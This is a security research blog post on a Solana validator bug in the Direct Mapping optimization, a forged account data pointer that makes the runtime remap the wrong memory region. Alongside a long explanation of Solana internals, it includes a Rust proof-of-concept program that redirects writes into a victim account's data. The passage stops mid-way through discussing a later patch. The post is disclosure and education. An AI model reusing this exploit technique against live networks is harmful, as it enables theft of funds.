← Back to Blog

Pwning Solana for Fun and Profit - Exploiting a Subtle Rust Bug for Validator RCE and Money-Printing

by anatomist

The Road to RCE

In this blog, we examine the Direct Mapping optimization first introduced in Solana version 1.16. Our research revealed a critical vulnerability caused by an oversight in pointer management, ultimately allowing us to achieve full remote code execution (RCE) on a validator node. This feature was never enabled on mainnet, but had this flaw gone unpatched, it could have compromised the entire Solana network—putting what is today over $9 billion in total value locked (TVL) at risk.

In addition to diving into vulnerability details, we want to also demystify the bug-hunting process in this blog. As fascinating as it is to read about all the astonishing findings published by security researchers, rarely do we get a glimpse at the thought process behind. The path to discovering a critical bug is often marked by dead ends, intuition, curiosity, and deep system internals knowledge. By walking through our initial observations and narrowing down the actual vulnerability, we hope to shed light on what real-world vulnerability research looks like.

Before we start, if you're primarily interested in the technical discussions, skip ahead to the Setting the Stage: A Primer on Solana's Execution Environment section, where we discuss the background knowledge required to understand the bug. If you know your way around Solana internals and just want to read about the bug, you can jump directly to The Vulnerability section. Otherwise, sit back and join us as we revisit this rollercoaster of a journey. :)

Very Long Story, Hopefully Short Enough

Many blockchains have embraced modern programming languages like Rust and Go, which are often seen as safer alternatives to lower-level options like C or C++. While language choice is sometimes a matter of taste, it significantly shapes a protocol’s security profile. Solana uses Rust, a language renowned for memory safety and object lifetime management.

But of course, no software is impenetrable. Even before we discovered the RCE vulnerability, our dissection of Solana had already uncovered several validator mismatch bugs that could compromise the chain's liveness. These ranged from non-deterministic execution across multiple validators to misconfigurations in feature gating that led to unsynchronized upgrades. All of which indicate that Solana isn’t bulletproof.

Most of the bugs we previously found leans more to the business logic side. After getting several of these, we are no longer satisfied with unveiling just another business logic bug. We want something deeper, something buried deep in Solana's system internals—the kind you uncover only through the most meticulous anatomy.

One target we set sight on is the removal of memory address translation, which seems like a powerful, but extremely dangerous optimization. Unfortunately, this feature never materialized.

While we're keeping watch of the address translation feature, we started exploring adjacent parts of the codebase. It wasn't long before we stumbled upon another interesting feature called Direct Mapping. And it was in this feature we discovered the kind of vulnerability we're looking for, one with the potential to compromise the entire blockchain.

As you might already know, every performance optimization carries the risk of introducing vulnerabilities. The intuitive way to manage VM memory is to isolate it completely from the host running it. This ensures safety but sometimes introduces performance hits. Attempting to eliminate this isolation for speed, while still maintaining security, is ambitious and inherently risky.

Solana began developing the optimization starting with Direct Mapping, especially during Cross-Program Invocations (CPI), when programs must serialize and copy large amounts of account data, resulting in significant execution overhead. The new Direct Mapping mechanism introduced in Solana v1.16 aimed to eliminate unnecessary copying. Account data buffers are directly mapped into VM memory with the pointers dynamically updated rather than copying the entire data. However, this optimization required strict runtime validation of pointers during these dynamic updates, which was inadequately implemented and ultimately introduced the vulnerability.

The vulnerability was powerful, but unfortunately, our exploit hit an unexpected wall thanks to an unrelated patch. After some hard work navigating the new limitations, we ultimately managed to craft a working exploit. Now, if you're ready, let's dive into the technical details.

Setting the Stage: A Primer on Solana's Execution Environment

To analyze the security of a system, we first need to understand how it works. Solana is heavily optimized for performance, more specifically, parallel execution of transactions, and requires extra care to prevent race conditions or non-determinism issues that may lead to liveness failures. This results in an object oriented design that incorporating Solana's unique data storage and transaction models.

The Solana Account Model

In Solana, everything is stored in what are called Accounts. You can think of the entire state of the Solana blockchain as a giant key-value store, where the "key" is an Address (a Pubkey) and the "value" is the account data itself.

An Account holds several information, most importantly, it tracks the amount of native tokens an account has (lamports), the owner of the account, and an opaque data field.

1pub struct Account { 2 pub lamports: u64, // Native token balance 3 pub data: Vec<u8>, // Variable-length state data 4 pub owner: Pubkey, // Program authorized to modify this account 5 pub executable: bool, // Whether this account contains executable code 6 pub rent_epoch: Epoch, // Rent tracking information 7}

The data field is where the magic happens. For a simple wallet account, this might be empty. But for an account owned by a program, this byte array holds all of its state. The structure of this data is defined by each program. This data field is the central component of our story.

Transaction and Instruction Flow

To take full advantage of storing data as Account, Solana Transaction specify upfront which accounts it intends to access, as well as how it intends to access the accounts (read only or read + write). This allows validators to check if different transactions has overlapping storage access, and decide on whether it is safe to schedule transactions for execution in parallel.

Transaction can also include multiple Instruction, each of which is a contract call. This provides a scripting capability for users to perform complex operations in a single transaction. The Instructions in a Transaction are executed sequentially and atomically.

1pub struct Transaction { 2 pub signatures: Vec<Signature>, 3 pub message: Message, 4} 5 6pub struct Message { 7 pub header: MessageHeader, // Access type (read / write) of each accessed account 8 pub account_keys: Vec<Pubkey>, // Accounts accessed by the transaction 9 pub instructions: Vec<CompiledInstruction>, // Actions performed by the transaction 10 ... 11} 12 13pub struct MessageHeader { 14 pub num_required_signatures: u8, 15 pub num_readonly_signed_accounts: u8, 16 pub num_readonly_unsigned_accounts: u8, 17} 18 19pub struct Instruction { 20 pub program_id: Pubkey, // Program to execute 21 pub accounts: Vec<AccountMeta>, // Accounts this instruction will access 22 pub data: Vec<u8>, // Instruction-specific data 23}

The rBPF Virtual Machine

Solana programs are typically written in Rust and compiled to a variant of eBPF (extended Berkeley Packet Filter) bytecode. The validator executes this bytecode within a sandboxed virtual machine.

For each transaction, the validator allocates a dedicated, isolated memory space for the VM. The virtual address memory map used by Solana SBF programs is fixed and laid out as follows:

10x100000000 - CODE : Program executable bytecode 20x200000000 - STACK : Call stack (4KB frames) 30x300000000 - HEAP : Dynamic memory (32KB region) 40x400000000 - INPUT : Program input parameters & serialized account data

Within the VM, during execution, programs can modify their own memory however they want without affecting the memory stored on the host. All validation is checked after the program execution completes.

The Legacy Model: Single Program Execution (~v1.14.x)

Let's first understand how a simple program execution flows in the legacy model. This process involves four main phases: loading accounts from the database, executing bytecode in the rBPF VM, validating changes to guarantee integrity, and committing the results to storage.

Single Program Memory Layout

As shown in the diagram above, the legacy model serializes all account data into a contiguous INPUT region. Here's how this process works:

Phase 1: Loading and Serializing Accounts

The host and VM operate in completely isolated environments, they can't share objects or pointers directly. All account data must cross this boundary through serialization and deserialization, creating a controlled interface between the trusted host and the sandboxed VM.

The validator loads all requested accounts from the database and serializes them into a binary blob that gets copied into the INPUT region at 0x400000000. Once inside the VM, programs usually start by deserializing the raw serialized Accounts into AccountInfo structures in its bootstrap routine. The AccountInfo are stored in the VM's heap memory before handing control to the program entrypoint function:

1// How programs reconstruct AccountInfo from the serialized data 2pub struct AccountInfo<'a> { 3 pub key: &'a Pubkey, 4 pub lamports: Rc<RefCell<&'a mut u64>>, 5 pub data: Rc<RefCell<&'a mut [u8]>>, // Points directly into INPUT region! 6 pub owner: &'a Pubkey, 7 pub rent_epoch: Epoch, 8 pub is_signer: bool, 9 pub is_writable: bool, 10 pub executable: bool, 11}

AccountInfo.data points directly into the serialized representation within the INPUT region. For instance, if a program writes account.data.borrow_mut()[0] = 42, it's modifying the serialized data in VM memory.

Programs can interact directly with the serialized bytes. Parsing serialized accounts into AccountInfo is just what the solana program sdk does to make life easier for developers.

Phase 2: Program Execution

Once the accounts are serialized and loaded into the INPUT region, the rBPF VM executes the program bytecode. The program has absolute control over its virtual memory space. It can overwrite account balances, change ownership, modify data, even corrupt the entire memory space. This design choice allows for maximum performance during execution, with security enforcement deferred to the validation phase.

Phase 3: Post-Execution Validation

After the program finishes execution, the validator validates every change made during execution. It doesn't trust anything that happened during execution. Instead, it carefully checks every modification to ensure no rules were broken and no money was stolen.

Validation rules ensure state consistency and permission enforcement before persisting account state updates to storage:

  • Account fields modifiable only if the account is marked writable in the Transaction and Instruction.
  • Only the account owner modifies owner and data.
  • Owner modifiable only when data is zeroed.
  • Lamports can be increased by anyone but decreased only by the owner.
  • Total lamports remains consistent across transaction execution.

Phase 4: Final Commit

After all validation rules pass, the modified account states are committed back to the database. All changes made during program execution are now persisted and the transaction is confirmed. If any validation rule fails, the entire transaction is rejected and no changes are stored.

Sounds simple, right?

When Programs Need to Talk: Cross-Program Invocation (v1.14.x)

But what happens when programs need to invoke each other, for instance, when your dex program needs to call the token program to transfer tokens? This is where Cross-Program Invocation (CPI) comes in, and where the elegant simplicity of single program execution starts to break down.

The challenge is that each program runs in its own isolated VM with its own memory space. When Program A calls Program B, they can't simply share pointers or objects. Account data must be carefully marshaled between these isolated environments while maintaining security and consistency.

TransactionContext: Shared Account Cache

This brings us to a detail we omitted up till now. Since Transaction are atomic and may include multiple Instruction, it must have a way to cache temporal execution results of earlier Instructions before latter Instructions finish. This cache is crucial since we can't allow executions effects of earlier Instructions to persist if unfortunately latter Instructions revert.

To this end, Solana introduces the TransactionContext structure state caching. The TransactionContext contains AccountSharedData structures, which are used to hold changes to accounts before the runtime either commits the changes to permanent storage, or reverts them later.

1pub struct TransactionContext { 2 account_keys: Pin<Box<[Pubkey]>>, // All account addresses in transaction 3 accounts: Arc<TransactionAccounts>, // Shared account data cache 4 instruction_stack: Vec<InstructionContext>, // CPI call stack 5 ... 6} 7 8pub struct TransactionAccounts { 9 accounts: Vec<RefCell<AccountSharedData>>, // Mutable account data 10 ... 11} 12 13// Shared account data that persists across CPI boundaries 14pub struct AccountSharedData { 15 lamports: u64, 16 data: Arc<Vec<u8>>, // Thread-safe shared data buffer 17 owner: Pubkey, 18 ... 19}

Handling CPI is somewhat similar to handling multiple Instructions, so the same TransactionContext can be repurposed to pass information between programs.

On CPI calls / returns, we need to expose the latest account states from the invoking side to the receiving side of the CPI. Solana runtime does this by first validating the latest changes to the account and committing them into the TransactionContext, then passing the accounts in the TransactionContext into the other VM.

CPI Call Process

CPI Call

The TransactionContext we described earlier lives on the host and serves as the bridge between two isolated VMs. When Program A calls Program B, each program runs in its own separate VM with isolated memory spaces, but they share account state through the host-side TransactionContext. Here's what happens:

Step 1: Instruction Crafting

Program A constructs a CPI instruction specifying the callee's program ID and metadata of accounts involved. This includes each account's address, whether the account's owner has signed the instruction, and whether the account should be writable.

Step 2: Load Account Data

The runtime creates CallerAccount structures by resolving AccountInfo structures from Program A's VM memory. These CallerAccount structures hold mutable references pointing directly into Program A's serialized account data, and will be used later during CPI return to efficiently update the caller's state.

1// Resolved view of AccountInfo with direct field access 2struct CallerAccount<'a> { 3 lamports: &'a mut u64, // Direct mutable reference to lamports 4 owner: &'a mut Pubkey, // Direct mutable reference to owner 5 original_data_len: usize, // Track size changes for realloc handling 6 serialized_data: &'a mut [u8], // Points to serialized data in VM 7 vm_data_addr: u64, // VM address of AccountInfo.data pointer 8 ref_to_len_in_vm: &'a mut u64, // VM address of AccountInfo.data length 9 serialized_len_ptr: *mut u64, 10 executable: bool, 11 rent_epoch: u64, 12}

When Program B finishes execution, the runtime uses these mutable references to directly update Program A's VM memory without additional lookup.

Step 3: Validation and Cache Update

Before handing control to Program B, the runtime validates everything Program A has done so far, similar to the validation phase in single program execution. Only after validation passes are Program A's changes written to the shared cache. This ensures that the AccountSharedData always holds valid account state, so each program in the call chain sees only validated changes from previous programs.

Step 4: Serialization to Callee VM

Program B gets its own fresh VM with a new INPUT region. All account data from the shared cache gets serialized and copied into Program B's INPUT region, just like in single program execution. Program B can now run normally, seeing the same AccountInfo structures as if it were called directly.

CPI Return Process

CPI Return

When Program B finishes execution, the runtime must ensure all changes from Program B are valid before merging them back to Program A. Here's what happens:

Step 1: Validation and Cache Update

Program B's VM states are revalidated using the same rules as single program execution. This prevents Program B from violating ownership rules, stealing funds, or modifying read-only accounts. Only validated changes are written back to the shared cache, again, ensuring AccountSharedData always holds valid account state for subsequent programs in the call chain.

Step 2: Memory Buffer Management

Account data may grow during Program B's execution when the program calls realloc() to expand account storage. This happens when programs need to add new data fields, grow vectors, store additional state information, or allocate space for user data like NFT metadata. To handle this growth efficiently, the runtime reserves extra padding beyond the current data length when accounts are initially serialized into Program A's VM memory. This reserved space avoids expensive reallocation during execution. If Program B's growth exceeds the reserved padding, the transaction immediately reverts.

Step 3: Update Caller and Resume Execution

Validated account states from the shared cache are copied back into Program A's VM memory INPUT region. The runtime uses CallerAccount structures with their mutable references to efficiently update Program A's serialized account data.

The Performance Problem

Consider a typical DeFi swap with 4 nested program calls, each handling 10KB of account data. In the legacy model, each CPI call requires serializing this data into the callee's VM, then copying it back on return. For our 4-level call chain, this means 40KB of serialization going down and 40KB of copying back up, totaling 80KB of memory operations for a single transaction.

For a high-throughput blockchain processing thousands of complex transactions per second, this overhead becomes the performance bottleneck. Validators spent more time copying memory than executing actual program logic.

Solana needed a better runtime.

The Optimization That Broke Everything: Direct Mapping (v1.16.0)

In Solana version 1.16.0, an optimization known as Direct Mapping was introduced to address the performance issues arising from repetitive serialization and deserialization of large account data. Instead of creating separate copies of account data in the VM's INPUT region, Direct Mapping exposes the host's actual account data buffers directly to the VM, allowing programs to read and write the same memory that the host uses to store account state. This optimization is only applied to the account data field, and not other fields such as account owner or lamport. The justification is that all other fields are relatively small is size, and the overhead of the optimization might outweigh the performance gained. Only the data field is large enough to justify such optimizations.

MemoryRegion: The Foundation of VM Address Translation

Since we're preparing to map host memory into the virtual guest memory space, it's crucial to explain how Solana manages guest virtual memory.

The VM and host operate in separate address spaces. When a program running in the VM accesses memory at address 0x400000000, this virtual address must be translated to an actual host memory location. Solana handles this translation through MemoryRegion structures:

1pub struct MemoryRegion { 2 pub host_addr: Cell<u64>, // start host address 3 pub vm_addr: u64, // start virtual address 4 pub vm_addr_end: u64, // end virtual address 5 pub len: u64, // Length in bytes 6 pub vm_gap_shift: u8, // Address translation parameters 7 pub is_writable: bool, // Permission tracking 8}

Each MemoryRegion maps a range of VM virtual addresses to host memory addresses. When the VM accesses memory, the runtime looks up the appropriate MemoryRegion and translates the virtual address to the corresponding host address.

Legacy Model: Single MemoryRegion

In the legacy model, all account data was packed into one large serialized blob in the INPUT region, managed by a single MemoryRegion:

VM Address Range: 0x400000000 - 0x400100000
Host Address: Points to serialized account data buffer
State: Writable

This single MemoryRegion contained all serialized account data in one contiguous buffer.

Legacy MemoryRegion

Direct Mapping: Multiple MemoryRegions per Account

Direct Mapping fundamentally changes this architecture. Instead of creating separate copies of account data in a serialized buffer, Direct Mapping creates individual MemoryRegion for each account that point directly to the host's AccountSharedData buffers. When a program accesses account.data, the VM translates this access through the account's specific MemoryRegion to read or write the same memory buffer that the host uses to store the account state, eliminating the copying step entirely.

Legacy MemoryRegion

The diagram above shows this architectural shift: from one large MemoryRegion containing serialized copies to multiple MemoryRegions pointing directly to host account buffers.

Changes to the MemoryRegion Structure

And just by this, we just got rid of the need for excessive copies! Sounds too good to be true, right?

The optimization comes at a cost. Most noteably, Direct Mapping breaks the fundamental execution model that Solana previously relied upon. In the legacy model, programs could freely modify their VM memory because changes only affected local copies - validation happened afterward before committing to the host. With Direct Mapping, this approach no longer works because every VM write directly affects the actual account state recorded in the AccountSharedData within TransactionContext immediately. This forces Solana to implement immediate permission validation on every memory access.

But what checks must be done? Is read and write checks sufficient? The answer, unfortunately, is no. We'll start with presenting the changes to the MemoryRegion structure, and work our way back to the reasons behind the change.

1pub struct MemoryRegion { 2 pub host_addr: Cell<u64>, // start host address 3 pub vm_addr: u64, // start virtual address 4 pub vm_addr_end: u64, // end virtual address 5 pub len: u64, // Length in bytes 6 pub vm_gap_shift: u8, // Address translation parameters 7 pub state: Cell<MemoryState>, // Permission tracking 8} 9 10pub enum MemoryState { 11 Readable, // The memory region is readable 12 Writable, // The memory region is writable 13 Cow(u64), // The memory region is writable but must be copied before writing 14}

Each MemoryRegion now tracks its permission state and enforces access controls on data writes. When a program tries to write to account data, the runtime immediately checks the region's state and either allows the write, triggers a copy-on-write operation, or rejects the access entirely.

The key change is the addition of the state field that replaces the simple is_writable boolean. This allows for more sophisticated permission management, particularly the Cow(u64) state that triggers copy-on-write operations when needed.

Copy-on-Write (CoW) Strategy

Now let's start discussing why an additional copy-on-write state is required.

Avoid Authoritative Data Contamination

Aside from plain read and write authorization, Direct Mapping introduces an even greater problem, the rollback of changes on transaction reverts. But why is this a problem? Aren't the AccountSharedDatas in TransactionContext already a cache? This boils down to some details of TransactionContext that we ommitted earlier.

When TransactionContext and AccountSharedData are first created, AccountSharedData.data actually points to the authoritative account data of the persistent storage (notice AccountSharedData is an Arc::<Vec<u8>>). Upon flushing account changes to AccountSharedData on CPI or instruction boundaries, if the data is modified, Arc::make_mut will be called to create a copy of the data to avoid contamination of the authoritative copy. This is effectively a copy-on-write mechanism to prevent TransactionContext from having to clone all account data. The effectiveness is however limited by the need to serialize data into VMs.

With Direct Mapping, the serialization is removed, allowing us to fully enjoy the benifits copy-on-write brings, but it is also no longer possible to rely on calling Arc::make_mut on CPI and instruction boundaries to protect the authoritative copy. Instead, the copy-on-write mechanism needs to be inlined into the timely memory access verfications.

This is where the copy-on-write state comes in handy. By adding a dedicated state, Solana can differentiate between first and latter writes to account data. First writes will see a MemoryRegion of the state CoW and consequently make a copy of the data buffer and update the state. Latter writes will then see a state of Writable, and know that we're already operating on a dedicated copy and no longer need to worry about contanimating authoritative data.

Buffer Reallocation Management

Naturally, with the Direct Mapping enabled, we'd also need to address account data growth possibilities. A naive approach would be to resize the underlying AccountSharedData buffer whenever more space is required. This approach is inefficient, however, since each resize might introduce a realloc of the data buffer, and in turn, require a copy of the data. Frequent copies defeat the entire purpose of the Direct Mapping optimization.

Solana's approach is to instead over-reserve the reallocated buffer size. On the first copy of the data (i.e. copy-on-write), the AccountSharedData.data reserves a buffer big enough to accommodate the max account data growth allowed by a transaction. This removes the need to constantly reallocate the buffer.

Copy on Write

Summarizing the ideas, copy-on-write under Direct Mapping appears as shown in the diagram above, where AccountSharedData may have it's data vector clones, and MemoryRegion must have its Host_Addr updated accordingly.

For reference, the code for writing to virtual memory now looks like this. Where memory access authorization is checked inline, and a callback function is used to update MemoryRegion and AccountSharedData.data for buffers in CoW state.

1pub fn create_vm<'a, 'b>(...) -> Result<EbpfVm<'a, RequisiteVerifier, InvokeContext<'b>>, Box<dyn std::error::Error>> { 2 let stack_size = stack.len(); 3 let heap_size = heap.len(); 4 let accounts = Arc::clone(invoke_context.transaction_context.accounts()); 5 let memory_mapping = create_memory_mapping( 6 ... 7 regions, 8 // this is the cow_cb 9 Some(Box::new(move |index_in_transaction| { 10 // The two calls below can't really fail. If they fail because of a bug, 11 // whatever is writing will trigger an EbpfError::AccessViolation like 12 // if the region was readonly, and the transaction will fail gracefully. 13 let mut account = accounts 14 .try_borrow_mut(index_in_transaction as IndexOfAccount) 15 .map_err(|_| ())?; 16 accounts 17 .touch(index_in_transaction as IndexOfAccount) 18 .map_err(|_| ())?; 19 20 if account.is_shared() { 21 // See BorrowedAccount::make_data_mut() as to why we reserve extra 22 // MAX_PERMITTED_DATA_INCREASE bytes here. 23 account.reserve(MAX_PERMITTED_DATA_INCREASE); 24 } 25 Ok(account.data_as_mut_slice().as_mut_ptr() as u64) 26 })), 27 )?; 28 ... 29) 30 31fn ensure_writable_region(region: &MemoryRegion, cow_cb: &Option<MemoryCowCallback>) -> bool { 32 match (region.state.get(), cow_cb) { 33 (MemoryState::Writable, _) => true, 34 (MemoryState::Cow(cow_id), Some(cb)) => match cb(cow_id) { 35 Ok(host_addr) => { 36 region.host_addr.replace(host_addr); 37 region.state.replace(MemoryState::Writable); 38 true 39 } 40 Err(_) => false, 41 }, 42 _ => false, 43 } 44} 45 46impl<'a> UnalignedMemoryMapping<'a> { 47 ... 48 pub fn store<T: Pod>(&self, value: T, mut vm_addr: u64, pc: usize) -> ProgramResult { 49 let mut len = mem::size_of::<T>() as u64; 50 51 let cache = unsafe { &mut *self.cache.get() }; 52 53 let mut src = &value as *const _ as *const u8; 54 55 let mut region = match self.find_region(cache, vm_addr) { 56 Some(region) if ensure_writable_region(region, &self.cow_cb) => { 57 // fast path 58 if let ProgramResult::Ok(host_addr) = region.vm_to_host(vm_addr, len) { 59 // Safety: 60 // vm_to_host() succeeded so we know there's enough space to 61 // store `value` 62 unsafe { ptr::write_unaligned(host_addr as *mut _, value) }; 63 return ProgramResult::Ok(host_addr); 64 } 65 region 66 } 67 _ => { 68 return generate_access_violation(self.config, AccessType::Store, vm_addr, len, pc) 69 } 70 }; 71 72 // slow path, handle writes that span multiple memory regions 73 ... 74 } 75 ... 76}

Commit Process Changes

The new CoW strategy also changes how account data is committed due to the mapping constraints:

Directly Mapped Data: The original data length portion has already been modified through direct mapping and requires no additional copying.

Growth Area Data: When programs expand account data using realloc(), the new data initially lives in the reserved buffer space within the INPUT section. Since the reserved buffer isn't mapped to host memory (we can only map the exact current data size), an additional copy operation is required to move growth data from the unmapped reserved buffer to the actual account data buffer in host memory.

This mapping constraint means that while Direct Mapping eliminates copying for existing data, growth scenarios still require copying from the unmapped reserved space.

Impact on Cross-Program Invocation

With data writes handled, the next thing to understand is how CPI works under the new design.

CPI Call Process

The CPI call process remains quite similar to the original design. Most steps are unchanged:

  1. Retrieve metadata of accounts involved in the CPI instruction
  2. Look up corresponding AccountSharedData from the TransactionContext
  3. Translate guest addresses in AccountInfo into host pointers to construct CallerAccount structures
  4. Update reserved buffer and validate account changes and write them back to AccountSharedData
  5. Serialize AccountSharedData into callee program's INPUT section

A minor difference is, before step 4 validation, instead of copying the entire account data, we only copy newly grown data that's still in the reserved buffer back to the newly allocated direct-mapped buffer and verify other fields then write them back into AccountSharedData.

New CPI Call

CPI Return Process

The major differences occur when returning from a CPI call. Since we're using direct mapping, Vector CoW operations might occur during nested calls, requiring us to check if the original data buffer mapping has been relocated.

1-1. Copy data from reserved buffer back to the directly mapped data buffer. 1-2. Validate all account changes using the same rules as single program execution 2. Check if data buffer was relocated during CoW operations, if relocation occurred, update the parent's MemoryRegion.host_addr to reflect the change 3. Ensure the account data length hasn't exceeded the limits expected by the caller program 4. Write the consolidated account changes back into the parent program's INPUT region

Notably, steps 2 is a new action introduced by Direct Mapping. Since Vector CoW operations might occur during nested calls, we must detect buffer relocations and update memory mappings to maintain consistency.

New CPI Return

The MemoryRegion Update Mechanism

When CoW operations relocate account data buffers during CPI execution, the parent program's MemoryRegions still point to the old buffer locations, we need to update it to reflect the change. So how exactly does the update mechanism look like?

MemoryRegion manage virtual-to-host address mappings, with each region covering non-overlapping virtual address ranges. When a buffer gets relocated, we need to identify which specific MemoryRegion needs updating and modify its host_addr to point to the new location.

Solana uses the vm_data_addr field stored in CallerAccount to locate the correct MemoryRegion:

  1. Locate the Target Region: Use vm_data_addr to find the MemoryRegion that maps the account's data. This address should correspond to a virtual address within one of the MemoryRegion's ranges.
  2. Compare Buffer Addresses: Check if the MemoryRegion's current host_addr matches the account's actual data buffer address in AccountSharedData. If they differ, a relocation occurred during CoW operations.
  3. Update the Mapping: Replace the MemoryRegion's host_addr with the new buffer address from AccountSharedData, ensuring future VM memory accesses resolve to the correct location.
  4. Complete the Update: After updating host_addr, when the parent program accesses memory at the same virtual address, it will now correctly resolve to the relocated buffer location.

MemoryRegion Update

This mechanism relies on an assumption: that vm_data_addr accurately identifies the correct MemoryRegion to update.

The code of searching for a region containing some specific vm_addr is shown here

1impl<'a> UnalignedMemoryMapping<'a> { 2 ... 3 fn find_region(&self, cache: &mut MappingCache, vm_addr: u64) -> Option<&MemoryRegion> { 4 if let Some(index) = cache.find(vm_addr) { 5 ... 6 } else { 7 let mut index = 1; 8 // region_addresses is eytzinger ordered array of MemoryRegions, so we 9 // do a binary search here 10 while index <= self.region_addresses.len() { 11 // Safety: 12 // we start the search at index=1 and in the loop condition check 13 // for index <= len, so bound checks can be avoided 14 index = (index << 1) 15 + unsafe { *self.region_addresses.get_unchecked(index - 1) <= vm_addr } 16 as usize; 17 } 18 index >>= index.trailing_zeros() + 1; 19 if index == 0 { 20 return None; 21 } 22 // Safety: 23 // we check for index==0 above, and by construction if we get here index 24 // must be contained in region 25 let region = unsafe { self.regions.get_unchecked(index - 1) }; 26 ... 27 Some(region) 28 } 29 } 30 ... 31}

The Vulnerability

So how are MemoryRegion.host_addr updates implemented? The update_caller_account() function needs to detect when account data has been relocated due to CoW operations and update the corresponding memory regions.

1impl<'a> UnalignedMemoryMapping<'a> { 2 ... 3 pub fn region( 4 &self, 5 access_type: AccessType, 6 vm_addr: u64, 7 ) -> Result<&MemoryRegion, Box<dyn std::error::Error>> { 8 // Safety: 9 // &mut references to the mapping cache are only created internally from methods that do not 10 // invoke each other. UnalignedMemoryMapping is !Sync, so the cache reference below is 11 // guaranteed to be unique. 12 let cache = unsafe { &mut *self.cache.get() }; 13 if let Some(region) = self.find_region(cache, vm_addr) { 14 if (region.vm_addr..region.vm_addr_end).contains(&vm_addr) 15 && (access_type == AccessType::Load || ensure_writable_region(region, &self.cow_cb)) 16 { 17 return Ok(region); 18 } 19 } 20 Err(generate_access_violation(self.config, access_type, vm_addr, 0, 0).unwrap_err()) 21 } 22 ... 23} 24 25// Vulnerable implementation (simplified) 26fn update_caller_account( 27 invoke_context: &InvokeContext, 28 memory_mapping: &mut MemoryMapping, 29 is_loader_deprecated: bool, 30 caller_account: &mut CallerAccount, 31 callee_account: &mut BorrowedAccount<'_>, 32 direct_mapping: bool, 33) -> Result<(), Error> { 34 ... 35 36 if direct_mapping && caller_account.original_data_len > 0 { 37 ... 38 let region = memory_mapping.region(AccessType::Load, caller_account.vm_data_addr)?; 39 let callee_ptr = callee_account.get_data().as_ptr() as u64; 40 if region.host_addr.get() != callee_ptr { 41 region.host_addr.set(callee_ptr); 42 } 43 }

The immediate question is, does the invariant of correct identification of MemoryRegion hold?

The answer is no. Recall CallerAccount.vm_data_addr comes directly from AccountInfo.data.as_ptr() in the VM's heap memory - memory that programs have complete control over.

1fn from_account_info( 2 invoke_context: &InvokeContext, 3 memory_mapping: &MemoryMapping, 4 is_loader_deprecated: bool, 5 _vm_addr: u64, 6 account_info: &AccountInfo, 7 original_data_len: usize, 8) -> Result<CallerAccount<'a>, Error> { 9 ... 10 11 let (serialized_data, vm_data_addr, ref_to_len_in_vm, serialized_len_ptr) = { 12 // Double translate data out of RefCell 13 let data = *translate_type::<&[u8]>( 14 memory_mapping, 15 account_info.data.as_ptr() as *const _ as u64, 16 invoke_context.get_check_aligned(), 17 )?; 18 19 ... 20 21 ( 22 serialized_data, 23 vm_data_addr, 24 ref_to_len_in_vm, 25 serialized_len_ptr, 26 ) 27 }; 28 29 Ok(CallerAccount { 30 vm_data_addr, 31 ... 32 }) 33}

By manipulating the AccountInfo.data pointer in VM memory before triggering a CPI call, an attacker can forge the vm_data_addr value. This causes update_caller_account to locate the wrong MemoryRegion and update its host_addr to point to the attacker's target account data, effectively mapping the virtual memory of some MemoryRegion to a wrong host memory.

A Failed Exploit that Led Us Deeper

Though the primitive seems extremely powerful, the exploitation wasn't as smooth as it might seems. After identifying the critical oversight, we started assessing its impact.

Our first intuition is that since virtual memory are mapped incorrectly, it should be possible to bypass the memory write authorization checks, for exmaple, by mapping a writable virtual memory to some account data that should be readonly. This will be sufficient to allow attackers to steal funds by modifying token program accounts. Our first PoC implemented this idea, and it worked on an older version of Direct Mapping.

1use std::{ 2 ptr, 3 mem, 4 rc::Rc, 5 cell::RefCell, 6}; 7use solana_program::{ 8 account_info::AccountInfo, 9 instruction::{ 10 AccountMeta, 11 Instruction, 12 }, 13 program::invoke_signed, 14 entrypoint::{ 15 self, 16 ProgramResult, 17 }, 18 pubkey::Pubkey, 19}; 20 21entrypoint!(process_instruction); 22 23 24// accounts[0] : LEVERAGE account controlled by ATTACKER and owned by EXPLOIT program 25// accounts[1] : VICTIM account ATTACKER wants to modify 26// accounts[2] : BENIGN program that owns VICTIM account ATTACKER wants to modify 27pub fn process_instruction( 28 _program_id: &Pubkey, 29 accounts: &[AccountInfo], 30 _instruction_data: &[u8], 31) -> ProgramResult { 32 33 // trigger CoW here to prevent future issues 34 accounts[0].data.borrow_mut()[10] = 2; 35 36 // copy data pointers to force the following cpi update_caller_account to update incorrect region 37 unsafe{ 38 ptr::copy( 39 mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>( 40 &accounts[0].data //LEVERAGE 41 ), 42 mem::transmute( 43 mem::transmute::<&Rc<RefCell<&mut [u8]>>, *const u8>( 44 &accounts[1].data //VICTIM 45 ) 46 ), 47 mem::size_of::<Rc<RefCell<&mut [u8]>>>() 48 ); 49 } 50 invoke_signed( 51 &Instruction::new_with_bincode( 52 accounts[2].key.clone(), 53 b"", 54 vec![ 55 AccountMeta::new(accounts[1].key.clone(), false), 56 ] 57 ), 58 &[ 59 accounts[1].clone(), 60 ], 61 &[], 62 )?; 63 64 // this will write to accounts[1].data due to corrupted region.host_addr 65 accounts[0].data.borrow_mut()[10] = 1; 66 Ok(()) 67}

However, once we pulled the latest code, our PoC stopped working. How so?

Coincidentally, Solana was actively patching another bug while we were developing our PoC. We originally thought the patch was irrelevant to our bug, but it ended up blocking our first exploit.

The patch addresses a mistake where MemoryRegion states are not updated properly across CPIs. That fix landed in this commit. The main addition of the patch is shown below.

